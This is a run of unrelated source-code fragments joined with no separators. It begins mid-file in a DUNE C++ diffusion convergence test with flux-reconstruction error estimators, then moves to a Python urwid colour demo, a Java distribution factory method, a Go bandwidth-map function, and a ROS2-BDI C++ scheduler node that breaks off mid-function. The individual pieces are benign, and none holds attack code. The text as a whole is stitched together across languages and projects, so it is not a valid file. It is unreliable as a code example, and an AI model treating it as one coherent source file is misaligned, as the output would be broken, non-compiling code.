make_laplace_ipdg_flux_reconstruction_operator<M>(current_space.grid_view(), current_space, rt_space, symmetry_prefactor_, inner_penalty_, dirichlet_penalty_, this->diffusion(), this->weight_function(), intersection_diameter_); auto flux_reconstruction = reconstruction_op.apply(solution); double eta_R_2 = 0.; std::mutex eta_R_2_mutex; auto walker = XT::Grid::make_walker(current_space.grid_view()); walker.append( []() {}, [&](const auto& element) { auto local_df = this->diffusion().local_function(); local_df->bind(element); auto local_force = this->force().local_function(); local_force->bind(element); auto local_flux = flux_reconstruction.local_function(); local_flux->bind(element); auto flux_divergence = XT::Functions::divergence(*local_flux); flux_divergence.bind(element); // approximate minimum eigenvalue of the diffusion over the element ... double min_EV = std::numeric_limits<double>::max(); // ... which we do by evaluating at some quadrature points for (auto&& quadrature_point : QuadratureRules<double, d>::rule(element.type(), local_df->order() + 3)) { auto diff = local_df->evaluate(quadrature_point.position()); auto eigen_solver = XT::LA::make_eigen_solver(diff, {{"type", XT::LA::EigenSolverOptions<decltype(diff)>::types().at(0)}, {"assert_positive_eigenvalues", "1e-15"}}); min_EV = std::min(min_EV, eigen_solver.min_eigenvalues(1).at(0)); } DUNE_THROW_IF(!(min_EV > 0.), Exceptions::integrand_error, "The minimum eigenvalue of a positiv definite matrix must not be negative!" << "\n\nmin_EV = " << min_EV); auto L2_norm_2 = LocalElementIntegralBilinearForm<E>(LocalProductIntegrand<E>(), /*over_integrate=*/3) .apply2(*local_force - flux_divergence, *local_force - flux_divergence)[0][0]; const auto h = XT::Grid::diameter(element); const auto C_P = 1. / (M_PI * M_PI); // Poincare constant (known for simplices/cubes) std::lock_guard<std::mutex> lock(eta_R_2_mutex); eta_R_2 += (C_P * h * h * L2_norm_2) / min_EV; }, []() {}); walker.walk(/*parallel=*/true); self.current_data_["norm"][norm_id] = std::sqrt(eta_R_2); } else if (norm_id == "eta_DF") { norm_it = remaining_norms.erase(norm_it); // ... or here ... // compute estimate auto rt_space = make_raviart_thomas_space(current_space.grid_view(), current_space.max_polorder() - 1); auto reconstruction_op = make_laplace_ipdg_flux_reconstruction_operator<M>(current_space.grid_view(), current_space, rt_space, symmetry_prefactor_, inner_penalty_, dirichlet_penalty_, this->diffusion(), this->weight_function(), intersection_diameter_); auto flux_reconstruction = reconstruction_op.apply(solution); double eta_DF_2 = 0.; std::mutex eta_DF_2_mutex; auto walker = XT::Grid::make_walker(current_space.grid_view()); walker.append( []() {}, [&](const auto& element) { auto local_df = this->diffusion().local_function(); local_df->bind(element); auto local_solution = solution.local_function(); local_solution->bind(element); auto local_reconstruction = flux_reconstruction.local_function(); local_reconstruction->bind(element); auto result = XT::Grid::element_integral<E>( element, [&](const auto& xx) { const auto diff = local_df->evaluate(xx); const auto diff_inv = XT::LA::invert_matrix(diff); const auto solution_grad = local_solution->jacobian(xx)[0]; const auto flux_rec = local_reconstruction->evaluate(xx); auto difference = diff * solution_grad + flux_rec; auto tmp_vec = difference; diff_inv.mv(difference, tmp_vec); return tmp_vec * difference; }, std::max(local_df->order() + std::max(local_solution->order() - 1, 0), local_reconstruction->order()) + /*over_integrate=*/3); std::lock_guard<std::mutex> lock(eta_DF_2_mutex); eta_DF_2 += result; }, []() {}); walker.walk(/*parallel=*/true); self.current_data_["norm"][norm_id] = std::sqrt(eta_DF_2); } else ++norm_it; // ... or finally here. } // norms // let the Base compute the rest return BaseType::compute(refinement_level, remaining_norms, remaining_estimates, remaining_quantities); } // ... compute(...) std::unique_ptr<S> make_space(const GP& current_grid) override { if (space_type_ == "fv") return std::make_unique<FiniteVolumeSpace<GV>>(current_grid.leaf_view()); else if (space_type_.size() >= 4 && space_type_.substr(0, 4) == "dg_p") { const auto order = XT::Common::from_string<int>(space_type_.substr(4)); return std::make_unique<DiscontinuousLagrangeSpace<GV>>(current_grid.leaf_view(), order); } else if (space_type_.size() >= 4 && space_type_.substr(0, 4) == "cg_p") { const auto order = XT::Common::from_string<int>(space_type_.substr(4)); return std::make_unique<ContinuousLagrangeSpace<GV>>(current_grid.leaf_view(), order); } else { DUNE_THROW(XT::Common::Exceptions::wrong_input_given, "space_type_ = " << space_type_); return nullptr; } } // ... make_space(...) std::unique_ptr<O> make_residual_operator(const S& space) override { // define lhs operator (has to be a pointer to allow the residual operator to manage the memory in the end) auto lhs_op = std::make_unique<MatrixOperator<M, GV>>(make_matrix_operator<M>( space, (space_type_.size() >= 2 && space_type_.substr(0, 2) == "cg") ? Stencil::element : Stencil::element_and_intersection)); // - volume term lhs_op->append(LocalElementIntegralBilinearForm<E>(LocalLaplaceIntegrand<E>(this->diffusion()))); // - inner faces lhs_op->append(LocalCouplingIntersectionIntegralBilinearForm<I>( LocalLaplaceIPDGIntegrands::InnerCoupling<I>(1., this->diffusion(), this->weight_function())), {}, XT::Grid::ApplyOn::InnerIntersectionsOnce<GV>()); lhs_op->append(LocalCouplingIntersectionIntegralBilinearForm<I>(LocalIPDGIntegrands::InnerPenalty<I>( inner_penalty_, this->weight_function(), intersection_diameter_)), {}, XT::Grid::ApplyOn::InnerIntersectionsOnce<GV>()); // - Dirichlet faces lhs_op->append( LocalIntersectionIntegralBilinearForm<I>( LocalLaplaceIPDGIntegrands::DirichletCoupling<I>(1., this->diffusion())), {}, XT::Grid::ApplyOn::CustomBoundaryIntersections<GV>(this->boundary_info(), new XT::Grid::DirichletBoundary())); lhs_op->append( LocalIntersectionIntegralBilinearForm<I>(LocalIPDGIntegrands::BoundaryPenalty<I>( dirichlet_penalty_, this->weight_function(), intersection_diameter_)), {}, XT::Grid::ApplyOn::CustomBoundaryIntersections<GV>(this->boundary_info(), new XT::Grid::DirichletBoundary())); // define rhs functional auto rhs_func = make_vector_functional<V>(space); rhs_func.append(LocalElementIntegralFunctional<E>(LocalProductIntegrand<E>().with_ansatz(this->force()))); // ... add Dirichlet here // (if we add something here, the oswald interpolation in compute() needs to be adapted accordingly!) // ... add Neumann here // assemble everything in one grid walk lhs_op->append(rhs_func); lhs_op->assemble(DXTC_TEST_CONFIG_GET("setup.use_tbb", true)); // build residual operator auto residual_op = std::make_unique<ConstLincombOperator<M, GV>>(space, space); residual_op->add(lhs_op.release(), 1.); residual_op->add(new ConstantOperator<M, GV>(space, space, new V(std::move(rhs_func.vector()))), -1); return residual_op; } // ... make_residual_operator(...) std::string space_type_; const double symmetry_prefactor_; const double inner_penalty_; const double dirichlet_penalty_; const std::function<double(const I&)> intersection_diameter_; }; // class StationaryDiffusionIpdgEocStudy } // namespace Test } // namespace GDT } // namespace Dune #endif // DUNE_GDT_TEST_STATIONARY_EOCSTUDIES_DIFFUSION_IPDG_HH
#!/usr/bin/env python import urwid # =========================================================================== def exit_on_q(key): if key in ('q', 'Q'): raise urwid.ExitMainLoop() # =========================================================================== colour_groups = [ # all colours ('black ', 'white ', 'brown ', 'yellow '), ('dark red ', 'light red ', 'dark green ', 'light green',), ('dark blue ', 'light blue ', 'dark cyan ', 'light cyan ',), ('dark magenta ', 'light magenta ', 'dark gray ', 'light gray ',), # colours from Pygments ('dark cyan ', 'brown ', 'dark green ', 'dark magenta'), ('dark blue ', ), ('dark blue', ), ] highlights = [ 'dark gray', 'light gray', ] palette = [] mapset = [ {} for h in highlights ] for group in colour_groups: for colour in group: cname = colour.rstrip() palette.append( (cname, cname, '') ) for index, highlight in enumerate(highlights): hname = f'{cname}_{highlight}_hl' palette.append( ( hname, cname, highlight) ) mapset[index][cname] = hname # =========================================================================== # create a Text widget with each colour in the palette contents = [] #import pudb; pudb.set_trace() for group in colour_groups: text = [(cname.rstrip(), cname) for cname in group] contents.append( urwid.Text(text) ) for index, highlight in enumerate(highlights): contents.append( urwid.Text(' ') ) for group in colour_groups: text = [(cname.rstrip(), cname) for cname in group] contents.append( urwid.AttrMap( urwid.Text(text), mapset[index] ) ) walker = urwid.SimpleListWalker(contents) box = urwid.ListBox(walker) loop = urwid.MainLoop(box, palette, unhandled_input=exit_on_q) loop.run()
/** * Creates a new exponential family conditional distribution given the input list of parents. * @param parents the list of parents. * @param <E> the type of elements. * @return an exponential family conditional distribution. */ public <E extends EF_ConditionalDistribution> E newEFConditionalDistribution(List<Variable> parents){ if (!this.areParentsCompatible(parents)) throw new IllegalArgumentException("Parents are not compatible"); if (parents.isEmpty()) return (E)new EF_SparseMultinomial(this.variable); else { List<EF_SparseMultinomial> base_ef_dists = new ArrayList<>(); int size = MultinomialIndex.getNumberOfPossibleAssignments(parents); for (int i = 0; i < size; i++) { base_ef_dists.add(this.variable.getDistributionType().newEFUnivariateDistribution()); } return (E) new EF_BaseDistribution_MultinomialParents<EF_SparseMultinomial>(parents, base_ef_dists); } }
/* Build a map suitable for use as parms for a bandwidth request to the agent manager. The agent bandwidth flow-mod generator takes a more generic set of parameters and the match/action information is "compressed". OVS doesn't accept DSCP values, but shifted values (e.g. 46 == 184), so we shift the DSCP value given to be what OVS might want as a parameter. */ func ( fq *Fq_req ) To_bw_map( ) ( fmap map[string]string ) { fmap = make( map[string]string ) if fq == nil { return } if fq.Match.Smac != nil { fmap["smac"] = *fq.Match.Smac } else { fmap["smac"] = "" } if fq.Match.Dmac != nil { fmap["dmac"] = *fq.Match.Dmac } else { fmap["dmac"] = "" } if fq.Extip != nil { fmap["extip"] = *fq.Extip } else { fmap["extip"] = "" } if fq.Exttyp != nil { fmap["extdir"] = *fq.Exttyp } else { fmap["extdir"] = "" } if fq.Match.Vlan_id != nil { fmap["vlan_match"] = *fq.Match.Vlan_id } else { fmap["vlan_match"] = "" } if fq.Action.Vlan_id != nil { fmap["vlan_action"] = *fq.Action.Vlan_id } else { fmap["vlan_action"] = "" } fmap["queue"] = fmt.Sprintf( "%d", fq.Espq.Queuenum ) fmap["dscp"] = fmt.Sprintf( "%d", fq.Dscp << 2 ) fmap["ipv6"] = fmt.Sprintf( "%v", fq.Ipv6 ) fmap["timeout"] = fmt.Sprintf( "%d", fq.Expiry - time.Now().Unix() ) fmap["oneswitch"] = fmt.Sprintf( "%v", fq.Single_switch ) fmap["koe"] = fmt.Sprintf( "%v", fq.Dscp_koe ) if fq.Tptype != nil && *fq.Tptype != "none" && *fq.Tptype != "" { if fq.Match.Tpsport != nil { fmap["sproto"] = fmt.Sprintf( "%s:%s", *fq.Tptype, *fq.Match.Tpsport ) } if fq.Match.Tpdport != nil { fmap["dproto"] = fmt.Sprintf( "%s:%s", *fq.Tptype, *fq.Match.Tpdport ) } } if fq_sheep.Would_baa( 3 ) { for k, v := range fmap { fq_sheep.Baa( 3, "fq_req to action id=%s %s = %s", fq.Id, k, v ) } } return }
<reponame>devis12/ROS2-BDI // header file for Scheduler node #include "ros2_bdi_core/scheduler.hpp" // Inner logic + ROS PARAMS & FIXED GLOBAL VALUES for ROS2 core nodes #include "ros2_bdi_core/params/core_common_params.hpp" // Inner logic + ROS2 PARAMS & FIXED GLOBAL VALUES for Scheduler node #include "ros2_bdi_core/params/scheduler_params.hpp" // Inner logic + ROS2 PARAMS & FIXED GLOBAL VALUES for Belief Manager node (for belief set topic) #include "ros2_bdi_core/params/belief_manager_params.hpp" // Inner logic + ROS2 PARAMS & FIXED GLOBAL VALUES for Belief Manager node (for plan exec srv & topic) #include "ros2_bdi_core/params/plan_director_params.hpp" // Inner logic + ROS2 PARAMS & FIXED GLOBAL VALUES for PlanSys2 Monitor node (for psys2 state topic) #include "ros2_bdi_core/params/plansys2_monitor_params.hpp" #include <yaml-cpp/exceptions.h> #include "ros2_bdi_utils/BDIFilter.hpp" #include "ros2_bdi_utils/BDIPDDLConverter.hpp" #include "ros2_bdi_utils/BDIYAMLParser.hpp" #include "ros2_bdi_utils/ManagedCondition.hpp" #include "ros2_bdi_utils/ManagedConditionsConjunction.hpp" #include "ros2_bdi_utils/ManagedConditionsDNF.hpp" using std::string; using std::vector; using std::set; using std::map; using std::mutex; using std::shared_ptr; using std::chrono::milliseconds; using std::bind; using std::placeholders::_1; using std::optional; using plansys2::DomainExpertClient; using plansys2::ProblemExpertClient; using plansys2::PlannerClient; using plansys2::Instance; using plansys2::Predicate; using plansys2::Goal; using plansys2_msgs::msg::Plan; using plansys2_msgs::msg::PlanItem; using ros2_bdi_interfaces::msg::Belief; using ros2_bdi_interfaces::msg::Desire; using ros2_bdi_interfaces::msg::BeliefSet; using ros2_bdi_interfaces::msg::DesireSet; using ros2_bdi_interfaces::msg::Condition; using ros2_bdi_interfaces::msg::ConditionsConjunction; using ros2_bdi_interfaces::msg::ConditionsDNF; using ros2_bdi_interfaces::msg::PlanSys2State; using ros2_bdi_interfaces::msg::BDIActionExecutionInfo; using ros2_bdi_interfaces::msg::BDIPlanExecutionInfo; using ros2_bdi_interfaces::srv::BDIPlanExecution; using BDIManaged::ManagedBelief; using BDIManaged::ManagedDesire; using BDIManaged::ManagedPlan; Scheduler::Scheduler() : rclcpp::Node(SCHEDULER_NODE_NAME), state_(STARTING) { psys2_comm_errors_ = 0; this->declare_parameter(PARAM_AGENT_ID, "agent0"); this->declare_parameter(PARAM_DEBUG, true); this->declare_parameter(PARAM_MAX_TRIES_COMP_PLAN, 8); this->declare_parameter(PARAM_MAX_TRIES_EXEC_PLAN, 8); this->declare_parameter(PARAM_RESCHEDULE_POLICY, VAL_RESCHEDULE_POLICY_NO_IF_EXEC); this->declare_parameter(PARAM_AUTOSUBMIT_PREC, false); this->declare_parameter(PARAM_AUTOSUBMIT_CONTEXT, false); } /* Init to call at the start, after construction method, to get the node actually started initialing planner client instance, retrieving agent_id_ (thus namespace) defining work timer, belief set subscriber callback, desire set publisher, add/del desire subscribers callback */ void Scheduler::init() { //agent's namespace agent_id_ = this->get_parameter(PARAM_AGENT_ID).as_string(); // initializing domain expert domain_expert_ = std::make_shared<plansys2::DomainExpertClient>(); // initializing problem expert problem_expert_ = std::make_shared<plansys2::ProblemExpertClient>(); // initializing planner client planner_client_ = std::make_shared<plansys2::PlannerClient>(); // Declare empty desire set desire_set_ = set<ManagedDesire>(); // wait for it to be init init_dset_ = false; //Desire set publisher desire_set_publisher_ = this->create_publisher<DesireSet>(DESIRE_SET_TOPIC, 10); rclcpp::QoS qos_keep_all = rclcpp::QoS(10); qos_keep_all.keep_all(); //Check for plansys2 active state flags init to false psys2_planner_active_ = false; psys2_domain_expert_active_ = false; psys2_problem_expert_active_ = false; //plansys2 nodes status subscriber (receive notification from plansys2_monitor node) plansys2_status_subscriber_ = this->create_subscription<PlanSys2State>( PSYS2_STATE_TOPIC, qos_keep_all, bind(&Scheduler::callbackPsys2State, this, _1)); //Desire to be added notification add_desire_subscriber_ = this->create_subscription<Desire>( ADD_DESIRE_TOPIC, qos_keep_all, bind(&Scheduler::addDesireTopicCallBack, this, _1)); //Desire to be removed notification del_desire_subscriber_ = this->create_subscription<Desire>( DEL_DESIRE_TOPIC, qos_keep_all, bind(&Scheduler::delDesireTopicCallBack, this, _1)); //belief_set_subscriber_ belief_set_subscriber_ = this->create_subscription<BeliefSet>( BELIEF_SET_TOPIC, qos_keep_all, bind(&Scheduler::updatedBeliefSet, this, _1)); plan_exec_srv_client_ = std::make_shared<TriggerPlanClient>(PLAN_EXECUTION_SRV + string("_s_caller")); plan_exec_info_subscriber_ = this->create_subscription<BDIPlanExecutionInfo>( PLAN_EXECUTION_TOPIC, 10, bind(&Scheduler::updatePlanExecution, this, _1) ); //loop to be called regularly to perform work (publish belief_set_, sync with plansys2 problem_expert node...) do_work_timer_ = this->create_wall_timer( milliseconds(500), bind(&Scheduler::step, this)); RCLCPP_INFO(this->get_logger(), "Scheduler node initialized"); } /* Main loop of work called regularly through a wall timer */ void Scheduler::step() { // all psys2 up -> no psys2 comm. errors if(psys2_planner_active_ && psys2_domain_expert_active_ && psys2_problem_expert_active_ ) psys2_comm_errors_ = 0; //if psys2 appears crashed, crash too if(psys2_comm_errors_ > MAX_COMM_ERRORS) rclcpp::shutdown(); switch (state_) { case STARTING: { if(psys2_planner_active_ && psys2_domain_expert_active_ && psys2_problem_expert_active_){ psys2_comm_errors_ = 0; if(!init_dset_)//hasn't ben tried to init desire set yet { tryInitDesireSet(); init_dset_ = true; } setState(SCHEDULING); }else{ if(!psys2_planner_active_) RCLCPP_ERROR(this->get_logger(), "PlanSys2 Planner still not active"); if(!psys2_domain_expert_active_) RCLCPP_ERROR(this->get_logger(), "PlanSys2 Domain Expert still not active"); if(!psys2_problem_expert_active_) RCLCPP_ERROR(this->get_logger(), "PlanSys2 Problem Expert still not active"); psys2_comm_errors_++; } break; } case SCHEDULING: { publishDesireSet(); string reschedulePolicy = this->get_parameter(PARAM_RESCHEDULE_POLICY).as_string(); bool noPlan = noPlanSelected(); /* Either the reschedule policy is no if a plan is executing AND there is no plan currently in exec or the reschedule policy allows rescheduling while plan is in exec */ if(reschedulePolicy == VAL_RESCHEDULE_POLICY_NO_IF_EXEC && noPlan || reschedulePolicy != VAL_RESCHEDULE_POLICY_NO_IF_EXEC) { if(this->get_parameter(PARAM_DEBUG).as_bool()) RCLCPP_INFO(this->get_logger(), "Reschedule to select new plan to be executed"); reschedule(); }else{ //already selected a plan currently in exec } } case PAUSE: { //RCLCPP_INFO(this->get_logger(), "Not the moment to ask for new cleaning tasks yet"); break; } default: break; } } /* Publish the current desire set of the agent in agent_id_/desire_set topic */ void Scheduler::publishDesireSet() { DesireSet dset_msg = BDIFilter::extractDesireSetMsg(desire_set_); dset_msg.agent_id = agent_id_; desire_set_publisher_->publish(dset_msg); } /* Received notification about PlanSys2 nodes state by plansys2 monitor node */ void Scheduler::callbackPsys2State(const PlanSys2State::SharedPtr msg) { psys2_problem_expert_active_ = msg->problem_expert_active; psys2_domain_expert_active_ = msg->domain_expert_active; psys2_planner_active_ = msg->planner_active; } /* Expect to find yaml file to init the desire set in "/tmp/{agent_id}/init_dset.yaml" */ void Scheduler::tryInitDesireSet() { string init_dset_filepath = "/tmp/"+this->get_parameter(PARAM_AGENT_ID).as_string() + "/" + INIT_DESIRE_SET_FILENAME; try{ vector<ManagedDesire> init_mgdesires = BDIYAMLParser::extractMGDesires(init_dset_filepath); for(ManagedDesire initMGDesire : init_mgdesires) if(initMGDesire.getValue().size() > 0) addDesire(initMGDesire); if(this->get_parameter(PARAM_DEBUG).as_bool()) RCLCPP_INFO(this->get_logger(), "Desire set initialization performed through " + init_dset_filepath); }catch(const YAML::BadFile& bfile){ RCLCPP_ERROR(this->get_logger(), "Bad File: Desire set initialization failed because init. file " + init_dset_filepath + " hasn't been found"); }catch(const YAML::ParserException& bpars){ RCLCPP_ERROR(this->get_logger(), "YAML Parser Exception: Desire set initialization failed because init. file " + init_dset_filepath + " doesn't present a valid YAML format"); }catch(const YAML::BadConversion& bconvfile){ RCLCPP_ERROR(this->get_logger(), "Bad Conversion: Desire set initialization failed because init. file " + init_dset_filepath + " doesn't present a valid desire array"); }catch(const YAML::InvalidNode& invalid_node){ RCLCPP_ERROR(this->get_logger(), "Invalid Node: Desire set initialization failed because init. file " + init_dset_filepath + " doesn't present a valid desire array"); } } /* returns ACCEPTED iff managed belief can be put as part of a desire's value wrt. to its syntax */ TargetBeliefAcceptance Scheduler::targetBeliefAcceptanceCheck(const ManagedBelief& mb) { if(mb.pddlType() != Belief().PREDICATE_TYPE)//not predicate -> not accepted return UNKNOWN_PREDICATE; optional<Predicate> optPredDef = domain_expert_->getPredicate(mb.getName()); if(!optPredDef.has_value())//incorrect predicate name return UNKNOWN_PREDICATE; Predicate predDef = optPredDef.value(); if(predDef.parameters.size() != mb.getParams().size()) return SYNTAX_ERROR; vector<string> params = mb.getParams(); for(int i=0; i<params.size(); i++) { string instanceName = params[i]; optional<Instance> opt_ins = problem_expert_->getInstance(instanceName); if(!opt_ins.has_value())//found a not valid instance in one of the goal predicates return UNKNOWN_INSTANCES; else if(opt_ins.value().type != predDef.parameters[i].type)//instance types not matching definition return UNKNOWN_INSTANCES; } return ACCEPTED; } /* Check with the domain_expert and problem_expert to understand if this is a valid goal (i.e. valid predicates and valid instances defined within them) returns true iff managed desire can be considered syntactically correct (no syntactically incorrect beliefs) */ TargetBeliefAcceptance Scheduler::desireAcceptanceCheck(const ManagedDesire& md) { for(ManagedBelief mb : md.getValue()) { auto acceptance = targetBeliefAcceptanceCheck(mb); if(acceptance != ACCEPTED) return acceptance; } return ACCEPTED; } /* Compute plan from managed desire, setting its belief array representing the desirable state to reach as the goal of the PDDL problem */ optional<Plan> Scheduler::computePlan(const ManagedDesire& md) { //set desire as goal of the pddl_problem if(!problem_expert_->setGoal(Goal{BDIPDDLConverter::desireToGoal(md.toDesire())})){ psys2_comm_errors_++;//plansys2 comm. errors return std::nullopt; } string pddl_domain = domain_expert_->getDomain();//get domain string string pddl_problem = problem_expert_->getProblem();//get problem string return planner_client_->getPlan(pddl_domain, pddl_problem);//compute plan (n.b. goal unfeasible -> plan not computed) } /* Check if there is a current valid plan selected */ bool Scheduler::noPlanSelected() { return current_plan_.getDesire().getPriority() == 0.0f && current_plan_.getBody().size() == 0; } /* Select plan execution based on precondition, deadline */ void Scheduler::reschedule() { string reschedulePolicy = this->get_parameter(PARAM_RESCHEDULE_POLICY).as_string(); bool noPlan = noPlanSelected(); if(reschedulePolicy == VAL_RESCHEDULE_POLICY_NO_IF_EXEC && !noPlan)//rescheduling not ammitted return; //rescheduling possible, but plan currently in exec (substitute just for plan with higher priority) bool planinExec = reschedulePolicy != VAL_RESCHEDULE_POLICY_NO_IF_EXEC && !noPlan; // priority of selected plan float highestPriority = -1.0f; // deadline of selected plan float selectedDeadline = -1.0f;// init to negative value ManagedPlan selectedPlan; vector<ManagedDesire> discarded_desires; mtx_iter_dset_.lock();//to sync between iteration in checkForSatisfiedDesires() && reschedule() set<ManagedDesire> skip_desires; for(ManagedDesire md : desire_set_) { if(skip_desires.count(md) == 1) continue; //desire currently fulfilling if(current_plan_.getDesire() == md) continue; //plan in exec has higher priority than this one, skip this desire if(planinExec && current_plan_.getDesire().getPriority() > md.getPriority()) continue; bool computedPlan = false;//flag to mark plan for desire as computable bool invalidDesire = false;//flag to mark invalid desire // select just desires with satisyfing precondition and // with higher or equal priority with respect to the one currently selected bool explicitPreconditionSatisfied = md.getPrecondition().isSatisfied(belief_set_); if(explicitPreconditionSatisfied && md.getPriority() >= highestPriority){ optional<Plan> opt_p = computePlan(md); if(opt_p.has_value()) { computedPlan = true; ManagedPlan mp = ManagedPlan{md, opt_p.value().items, md.getPrecondition(), md.getContext()}; // does computed deadline for this plan respect desire deadline? if(mp.getPlanDeadline() <= md.getDeadline()) { // pick it as selected plan iff: no plan selected yet || desire has higher priority than the one selected // or equal priority, but smaller deadline if(selectedDeadline < 0 || md.getPriority() > highestPriority || mp.getPlanDeadline() < selectedDeadline) { selectedDeadline = mp.getPlanDeadline(); highestPriority = md.getPriority(); selectedPlan = mp; }else if(md.getPriority() <= highestPriority && this->get_parameter(PARAM_DEBUG).as_bool()){ RCLCPP_INFO(this->get_logger(), "There is a plan to fulfill desire \"" + md.getName() + "\", but "+ "it it's not the desire (among which a plan can be selected) with highest priority right now"); }else if(mp.getPlanDeadline() >= selectedDeadline && this->get_parameter(PARAM_DEBUG).as_bool()){ RCLCPP_INFO(this->get_logger(), "There is a plan to fulfill desire \"" + md.getName() + "\", but "+ "it it's not the desire (among which a plan can be selected) with highest priority and earliest deadline right now"); } }else if(this->get_parameter(PARAM_DEBUG).as_bool()) RCLCPP_INFO(this->get_logger(), "There is a plan to fulfill desire \"" + md.getName() + "\", but it does not respect the deadline constraint"); } else if(desireAcceptanceCheck(md) != ACCEPTED) //check if the problem is the goal not being valid { invalidDesire = true; } else { if(!this->get_parameter(PARAM_DEBUG).as_bool()) RCLCPP_INFO(this->get_logger(), "Desire \"" + md.getName() + "\" presents a valid goal, but planner cannot compute any plan for it at the moment"); } } else if(!explicitPreconditionSatisfied && this->get_parameter(PARAM_AUTOSUBMIT_PREC).as_bool()) { int pushed = 0; if(desireAcceptanceCheck(md) == ACCEPTED) { // explicit preconditions are not satisfied... see if it's feasible to compute a plan to reach them // (just if not already done... that's why you look into the invalid map) // if it is the case submit desire to itself with higher priority than the one just considered string fulfillPreconditionDesireName = md.getName() + "_fulfill_precondition"; //put slightly lower priority because these would be desires for satisfy the pre precondition vector<ManagedDesire> fulfillPreconditionDesires = BDIFilter::conditionsToMGDesire(md.getPrecondition(), fulfillPreconditionDesireName, std::min(md.getPriority()-0.01f, 1.0f), md.getDeadline()); for(ManagedDesire fulfillPreconditionD : fulfillPreconditionDesires) { auto precAcceptanceCheck = desireAcceptanceCheck(fulfillPreconditionD); if(desire_set_.count(fulfillPreconditionD) == 0 && precAcceptanceCheck == ACCEPTED)//fulfill precondition not inserted yet { if(this->get_parameter(PARAM_DEBUG).as_bool()) RCLCPP_INFO(this->get_logger(), "Precondition are not satisfied for desire \"" + md.getName() + "\" but could be satisfied: " + + " auto-submission desire \"" + fulfillPreconditionD.getName() + "\""); fulfillPreconditionD.setParent(md);//set md as its parent desire if(addDesire(fulfillPreconditionD, md, "_preconditions")) pushed++; } } } if(pushed == 0) invalidDesire = true; } if(invalidDesire || (!computedPlan && explicitPreconditionSatisfied)) { int invCounter = ++computed_plan_desire_map_[md.getName()]; //increment invalid counter for this desire int maxTries = this->get_parameter(PARAM_MAX_TRIES_COMP_PLAN).as_int(); TargetBeliefAcceptance desAcceptance = desireAcceptanceCheck(md); string desireProblem = (desAcceptance != ACCEPTED)? "invalid goal" : "plan not computable"; string desireOperation = (invCounter < maxTries && (desAcceptance == ACCEPTED || desAcceptance == UNKNOWN_INSTANCES))? "desire will be rescheduled later" : "desire will be deleted from desire set"; if(this->get_parameter(PARAM_DEBUG).as_bool()) RCLCPP_INFO(this->get_logger(), "Desire \"" + md.getName() + "\" (or its preconditions):" + desireProblem + " ; " + desireOperation + " (invalid counter = %d/%d). " + std::to_string(desAcceptance), invCounter, maxTries); if(invCounter >= maxTries || (desAcceptance != ACCEPTED && desAcceptance != UNKNOWN_INSTANCES))//desire now has to be discarded { discarded_desires.push_back(md);// plan to delete desire from desire_set (not doing here because we're cycling on desire) // check if this is trying to satisfy precondition and/or context condition of another desire // and there are no other desires within the same group -> delete that desire too int groupCounter = 0; for(ManagedDesire mdCheck : desire_set_) if(mdCheck.getDesireGroup() == md.getDesireGroup()) groupCounter ++; if(md.hasParent() && groupCounter == 0)//invalid desire has remained the last one in the group { discarded_desires.push_back(md.getParent());//parent cannot be satisfied either skip_desires.insert(md.getParent());//avoid to evaluate it later } } } } mtx_iter_dset_.unlock();//to sync between iteration in checkForSatisfiedDesires() && reschedule() //removed discarded desires for(ManagedDesire md : discarded_desires) delDesire(md); if(selectedPlan.getBody().size() > 0) { bool triggered = tryTriggerPlanExecution(selectedPlan); if(this->get_parameter(PARAM_DEBUG).as_bool()) { if(triggered) RCLCPP_INFO(this->get_logger(), "Triggered new plan execution success"); else RCLCPP_INFO(this->get_logger(), "Triggered new plan execution failed"); } } } /* Launch execution of selectedPlan; if successful current_plan_ gets value of selectedPlan return true if successful */ bool Scheduler::launchPlanExecution(const BDIManaged::ManagedPlan& selectedPlan) { //trigger plan execution bool triggered = plan_exec_srv_client_->triggerPlanExecution(selectedPlan.toPlan()); if(triggered) current_plan_ = selectedPlan;// selectedPlan can now be set as currently executing plan if(this->get_parameter(PARAM_DEBUG).as_bool()) { if(triggered) RCLCPP_INFO(this->get_logger(), "Triggered new plan execution fulfilling desire \"" + current_plan_.getDesire().getName() + "\" success"); else RCLCPP_INFO(this->get_logger(), "Triggered new plan execution fulfilling desire \"" + selectedPlan.getDesire().getName() + "\" failed"); } return triggered; } /* Abort execution of current_plan_; if successful current_plan_ becomes empty return true if successful */ bool Scheduler::abortCurrentPlanExecution() { bool aborted = plan_exec_srv_client_->abortPlanExecution(current_plan_.toPlan()); if(aborted) { if(this->get_parameter(PARAM_DEBUG).as_bool()) RCLCPP_INFO(this->get_logger(), "Aborted plan execution fulfilling desire \"%s\"", current_plan_.getDesire().getName()); current_plan_ = ManagedPlan{}; //notifying you're not executing any plan right now } return aborted; } /* If selected plan fit the minimal requirements for a plan (i.e. not empty body and a desire which is in the desire_set) try triggering its execution by srv request to PlanDirector (/{agent}/plan_execution) by exploiting the TriggerPlanClient */ bool Scheduler::tryTriggerPlanExecution(const ManagedPlan& selectedPlan) { string reschedulePolicy = this->get_parameter(PARAM_RESCHEDULE_POLICY).as_string(); bool noPlan = noPlanSelected(); //rescheduling not ammitted -> a plan already executing and policy not admit any switch with higher priority plans if(reschedulePolicy == VAL_RESCHEDULE_POLICY_NO_IF_EXEC && !noPlan) return false; //rescheduling possible, but plan currently in exec (substitute just for plan with higher priority) bool planinExec = reschedulePolicy != VAL_RESCHEDULE_POLICY_NO_IF_EXEC && !noPlan; if(planinExec) { //before triggering new plan, abort the one currently in exec if(this->get_parameter(PARAM_DEBUG).as_bool()) RCLCPP_INFO(this->get_logger(), "Ready to abort plan for desire \"" + current_plan_.getDesire().getName() + "\"" + " in order to trigger plan execution for desire \"" + selectedPlan.getDesire().getName() + "\""); //trigger plan abortion if(!abortCurrentPlanExecution()) return false;//current plan abortion failed } //desire still in desire set bool desireInDesireSet = desire_set_.count(selectedPlan.getDesire())==1; //check that a proper plan has been selected (with actions and fulfilling a desire in the desire_set_) if(selectedPlan.getBody().size() <= 0 || !desireInDesireSet) return false; return launchPlanExecution(selectedPlan); } /* Received update on current plan execution */ void Scheduler::updatePlanExecution(const BDIPlanExecutionInfo::SharedPtr msg) { auto planExecInfo = (*msg); ManagedDesire targetDesire = ManagedDesire{planExecInfo.target}; if(!noPlanSelected() && planExecInfo.target.name == current_plan_.getDesire().getName())//current plan selected in execution update { current_plan_exec_info_ = planExecInfo; string targetDesireName = targetDesire.getName(); if(planExecInfo.status != planExecInfo.RUNNING)//plan not running anymore { mtx_iter_dset_.lock(); bool desireAchieved = isDesireSatisfied(targetDesire); 